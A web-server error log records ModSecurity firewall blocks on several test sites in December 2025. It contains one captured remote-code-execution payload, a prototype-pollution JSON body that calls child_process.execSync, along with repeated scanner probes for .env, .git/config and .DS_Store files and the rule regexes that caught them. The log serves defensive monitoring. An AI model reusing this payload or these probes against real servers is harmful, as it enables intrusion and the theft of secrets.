[Sun Dec 28 21:07:18.956223 2025] [:error] [pid 1030682] [client 108.130.181.198:56634] [client 108.130.181.198] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aVGN9ns42-BWjoJ9tE6kkwAAAAQ"]
[Sun Dec 28 21:07:18.956743 2025] [:error] [pid 1030682] [client 108.130.181.198:56634] [client 108.130.181.198] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aVGN9ns42-BWjoJ9tE6kkwAAAAQ"]
[Sun Dec 28 21:07:18.957651 2025] [:error] [pid 1030682] [client 108.130.181.198:56634] [client 108.130.181.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aVGN9ns42-BWjoJ9tE6kkwAAAAQ"]
[Sun Dec 28 21:07:18.957843 2025] [:error] [pid 1030682] [client 108.130.181.198:56634] [client 108.130.181.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aVGN9ns42-BWjoJ9tE6kkwAAAAQ"]
[Mon Dec 29 23:08:14.545821 2025] [:error] [pid 1063002] [client 103.62.232.34:43260] [client 103.62.232.34] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVL7zoFhPatuXKF38m0PlQAAAAU"]
[Mon Dec 29 23:08:14.546108 2025] [:error] [pid 1063002] [client 103.62.232.34:43260] [client 103.62.232.34] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVL7zoFhPatuXKF38m0PlQAAAAU"]
[Mon Dec 29 23:08:14.546285 2025] [:error] [pid 1063002] [client 103.62.232.34:43260] [client 103.62.232.34] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVL7zoFhPatuXKF38m0PlQAAAAU"]
[Tue Dec 30 05:52:01.087543 2025] [authz_core:error] [pid 1076242] [client 167.71.175.236:45982] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Dec 30 05:52:04.088722 2025] [:error] [pid 1074063] [client 167.71.175.236:46004] [client 167.71.175.236] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aVNadAGuPbj6UeGK0iq72AAAAAQ"]
[Tue Dec 30 05:52:04.088962 2025] [:error] [pid 1074063] [client 167.71.175.236:46004] [client 167.71.175.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aVNadAGuPbj6UeGK0iq72AAAAAQ"]
[Tue Dec 30 05:52:04.089113 2025] [:error] [pid 1074063] [client 167.71.175.236:46004] [client 167.71.175.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aVNadAGuPbj6UeGK0iq72AAAAAQ"]
[Tue Dec 30 05:52:05.091544 2025] [:error] [pid 1074324] [client 167.71.175.236:46014] [client 167.71.175.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVNadelTTj38IyOu6gtvDgAAAAU"]
[Tue Dec 30 05:52:05.091767 2025] [:error] [pid 1074324] [client 167.71.175.236:46014] [client 167.71.175.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVNadelTTj38IyOu6gtvDgAAAAU"]
[Tue Dec 30 05:52:05.091958 2025] [:error] [pid 1074324] [client 167.71.175.236:46014] [client 167.71.175.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVNadelTTj38IyOu6gtvDgAAAAU"]
[Tue Dec 30 05:52:07.087037 2025] [:error] [pid 1074063] [client 167.71.175.236:46030] [client 167.71.175.236] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVNadwGuPbj6UeGK0iq72QAAAAQ"]
[Tue Dec 30 05:52:07.088189 2025] [:error] [pid 1074063] [client 167.71.175.236:46030] [client 167.71.175.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVNadwGuPbj6UeGK0iq72QAAAAQ"]
[Tue Dec 30 05:52:07.088351 2025] [:error] [pid 1074063] [client 167.71.175.236:46030] [client 167.71.175.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVNadwGuPbj6UeGK0iq72QAAAAQ"]
[Tue Dec 30 05:52:17.805109 2025] [authz_core:error] [pid 1074063] [client 206.189.2.13:46106] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Dec 30 05:52:20.937994 2025] [:error] [pid 1074059] [client 206.189.2.13:46128] [client 206.189.2.13] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aVNahO9oALJ4W8ifGBsD1gAAAAA"]
[Tue Dec 30 05:52:20.938291 2025] [:error] [pid 1074059] [client 206.189.2.13:46128] [client 206.189.2.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aVNahO9oALJ4W8ifGBsD1gAAAAA"]
[Tue Dec 30 05:52:20.938499 2025] [:error] [pid 1074059] [client 206.189.2.13:46128] [client 206.189.2.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aVNahO9oALJ4W8ifGBsD1gAAAAA"]
[Tue Dec 30 05:52:21.847026 2025] [:error] [pid 1074061] [client 206.189.2.13:46144] [client 206.189.2.13] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVNahTshcYdIl9SnQghAJgAAAAI"]
[Tue Dec 30 05:52:21.847243 2025] [:error] [pid 1074061] [client 206.189.2.13:46144] [client 206.189.2.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVNahTshcYdIl9SnQghAJgAAAAI"]
[Tue Dec 30 05:52:21.847395 2025] [:error] [pid 1074061] [client 206.189.2.13:46144] [client 206.189.2.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVNahTshcYdIl9SnQghAJgAAAAI"]
[Tue Dec 30 05:52:23.832351 2025] [:error] [pid 1074060] [client 206.189.2.13:46146] [client 206.189.2.13] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVNah2kuKTvBtTO8F8610wAAAAE"]
[Tue Dec 30 05:52:23.832714 2025] [:error] [pid 1074060] [client 206.189.2.13:46146] [client 206.189.2.13] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVNah2kuKTvBtTO8F8610wAAAAE"]
[Tue Dec 30 05:52:23.832960 2025] [:error] [pid 1074060] [client 206.189.2.13:46146] [client 206.189.2.13] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVNah2kuKTvBtTO8F8610wAAAAE"]
[Tue Dec 30 14:09:36.365855 2025] [:error] [pid 1074061] [client 195.178.110.160:59980] [client 195.178.110.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVPPEDshcYdIl9SnQghAZAAAAAI"]
[Tue Dec 30 14:09:36.366117 2025] [:error] [pid 1074061] [client 195.178.110.160:59980] [client 195.178.110.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVPPEDshcYdIl9SnQghAZAAAAAI"]
[Tue Dec 30 14:09:36.366292 2025] [:error] [pid 1074061] [client 195.178.110.160:59980] [client 195.178.110.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVPPEDshcYdIl9SnQghAZAAAAAI"]
[Tue Dec 30 14:09:36.683854 2025] [:error] [pid 1074063] [client 195.178.110.160:59988] [client 195.178.110.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aVPPEAGuPbj6UeGK0iq8CAAAAAQ"]
[Tue Dec 30 14:09:36.684113 2025] [:error] [pid 1074063] [client 195.178.110.160:59988] [client 195.178.110.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aVPPEAGuPbj6UeGK0iq8CAAAAAQ"]
[Tue Dec 30 14:09:36.684278 2025] [:error] [pid 1074063] [client 195.178.110.160:59988] [client 195.178.110.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aVPPEAGuPbj6UeGK0iq8CAAAAAQ"]
[Tue Dec 30 14:09:36.888847 2025] [:error] [pid 1074324] [client 195.178.110.160:60004] [client 195.178.110.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aVPPEOlTTj38IyOu6gtvPwAAAAU"]
[Tue Dec 30 14:09:36.889085 2025] [:error] [pid 1074324] [client 195.178.110.160:60004] [client 195.178.110.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aVPPEOlTTj38IyOu6gtvPwAAAAU"]
[Tue Dec 30 14:09:36.889242 2025] [:error] [pid 1074324] [client 195.178.110.160:60004] [client 195.178.110.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aVPPEOlTTj38IyOu6gtvPwAAAAU"]
[Tue Dec 30 14:09:37.298587 2025] [:error] [pid 1074996] [client 195.178.110.160:60026] [client 195.178.110.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aVPPEX-umz5_xg-D79wMzgAAAAY"]
[Tue Dec 30 14:09:37.298823 2025] [:error] [pid 1074996] [client 195.178.110.160:60026] [client 195.178.110.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aVPPEX-umz5_xg-D79wMzgAAAAY"]
[Tue Dec 30 14:09:37.299000 2025] [:error] [pid 1074996] [client 195.178.110.160:60026] [client 195.178.110.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aVPPEX-umz5_xg-D79wMzgAAAAY"]
[Tue Dec 30 14:09:37.530428 2025] [authz_core:error] [pid 1076242] [client 195.178.110.160:60034] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Tue Dec 30 14:09:37.668300 2025] [:error] [pid 1074059] [client 195.178.110.160:60046] [client 195.178.110.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aVPPEe9oALJ4W8ifGBsEBgAAAAA"]
